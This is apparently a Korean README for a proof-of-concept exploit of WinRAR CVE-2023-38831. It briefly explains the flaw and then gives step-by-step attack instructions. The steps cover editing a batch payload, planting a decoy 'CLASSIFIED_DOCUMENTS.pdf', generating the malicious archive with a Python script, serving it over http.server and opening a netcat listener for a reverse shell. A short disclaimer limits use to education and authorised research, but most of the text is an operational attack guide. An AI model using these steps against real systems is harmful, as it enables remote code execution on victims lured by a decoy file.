
WinRAR의 CVE-2023-38831을 악용하여 사용자가 정상 파일을 열 때 임의 코드를 실행하는 악성 RAR 아카이브를 생성하며, Python 기반 익스플로잇 생성기와 리스너 설정을 포함합니다.
⚠️ 교육 및 승인된 보안 연구 목적으로만 사용하세요
원본 PoC 작성자 b1tg와 Group-IB Threat Intelligence에 깊은 감사를 드립니다.
RARLabs WinRAR 6.23 이전 버전에서는 사용자가 ZIP 아카이브 내의 정상 파일을 보려고 할 때 공격자가 임의 코드를 실행할 수 있습니다.

이 문제는 ZIP 아카이브에 정상 파일(예: 일반 .JPG 파일)과 동일한 이름의 폴더가 포함될 수 있고, 정상 파일에만 접근하려는 시도 시 폴더의 내용(실행 가능한 콘텐츠 포함 가능)이 처리되기 때문에 발생합니다. 이 취약점은 2023년 4월부터 8월까지 실제 공격에 악용되었습니다.

먼저, script.bat 파일을 위험한 실행 코드로 수정하세요.
미끼 파일을 삽입하세요. 이미지(.png, jpg)나 문서(.pdf)를 권장합니다.
다음 명령어를 실행하여 익스플로잇 파일을 생성하세요.
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
익스플로잇 파일을 대상 머신에 전송하려면 python http.server를 사용하세요. 예:
python -m http.server
공격자 머신에서 리스너를 설정하세요:
nc -nlvp 4444
6.23 이전 버전의 WinRAR로 익스플로잇 파일을 다운로드하여 열세요.